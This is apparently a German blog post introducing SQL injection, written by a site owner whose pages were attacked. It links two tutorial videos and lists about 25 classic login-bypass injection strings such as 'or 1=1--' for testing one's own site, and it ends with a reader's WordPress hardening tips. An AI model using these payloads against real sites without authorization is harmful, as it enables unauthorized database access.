Wenn man eine eigne Webseite mit Datenbank hat wird man unweigerlich mit der Themtik SQL Injection konfrontiert werden. Es gibt eben zu viele Skript Kiddies da draußen, die meistens aus neugier heraus versuchen Webseiten, bzw. MYSQL Datenbanken zu hacken.
Ich selber wurde schon Opfer solcher Attacken. Es ist enorm wichtig seinen Server, bzw. sein CMS immer auf den aktuellsten stand zu halten, aber das wisst ihr wahrscheinlich schon.
Ich selber bin kein Hacker oder Coder, sondern wurschtel mich so durch die digitalen Datenwelten und eigne mir das Wissen an, was ich gerade in der Situation brauche. Inspiriert zu diesem Artikel hat mich die Session „Linkbuilding beyond the line“ vom BösenSEO auf der SEOCAMPIXX 2k10. Denn bisher habe ich mich immer nur über Angreifer meiner Webseiten geärgert und die Fehler in meinen Dateien beseitigt. Ich fragte mich, wie die Angreifer meine Datenbank austricksten konnten.
Umso erschreckender ist, wie einfach es ist an das Wissen für SQL Injection Attacken zu kommen. Generell Hacker Stuff ist sehr leicht im Netz zu finden, wenn man die entsprechenden Keyword kennt, wonach man suchen muss.
Wobei ich glaube, dass das wirklich gefährliche Wissen nicht so einfach zu erhalten ist. Auch sollte man nicht jedes zum Download angeboten Tool herunterladen, da es selber als Trojaner dienen könnte.
Auf Youtube findet man mehrere Lehrvideos auf Deutsch oder auf Englisch zum Thema SQL Injection. Hier zwei Lehrvideos zum Thema:
SQL-Injection – Einführung – Teil 1
[youtube 1UL_jdtXfi4]SQL-Injection – Einführung – Teil 2
[youtube nLmf-YlKpWo]Mögliche Variablen zum Testen
‚or“=‘
1’or’1’=’1
0’or’0’=’0
admin‘–
‚ or 0=0 —
“ or 0=0 —
or 0=0 —
‚ or 0=0 #
“ or 0=0 #
or 0=0 #
‚ or ‚x’=’x
“ or „x“=“x“
‚) or (‚x’=’x
‚ or 1=1–
“ or 1=1–
or 1=1–
‚ or a=a–
“ or „a“=“a
‚) or (‚a’=’a
„) or („a“=“a
hi“ or 1=1 —
hi‘ or 1=1 —
hi‘ or ‚a’=’a
hi‘) or (‚a’=’a
hi“) or („a“=“a
Ich nutze nun dieses Wissen um meine eigene Seiten aktiv nach eventuellen Schwachstellen zu testen. Dieser Artikel erhebt in keinsterweise den Anspruch das Thema SQL Injection vollständig abzudecken, es dient lediglich als Einstieg in die Thematik.
Welche Erfahrungen habt ihr mit SQL Injections gemacht? Wie schützt ihr euch vor Angreifern?
Hallo, ich bin der Gründer dieses Blogs. Am Anfang habe ich hier nur über SEO-Themen und Suchmaschinen geschrieben. Jetzt schreibe ich hier zusätzlich noch über Technik Themen und andere Dinge, die mich interessieren. Wenn ich Dich inspiriert habe, oder Du Hilfe bei einem Onlinemarketing Thema benötigst, scheue Dich nicht mich zu kontaktieren.
Aktuelle WP Version, aktuelle Plugins und davon nicht zu viele, keine dubiosen Sachen einbinden und wp-admin mit .htaccess Passwortschutz belegt & keine Registrierung für andere Benutzer geöffnet weil ich ja eh nur einer bin.. noch nie etwaige Probleme damit gehabt 🙂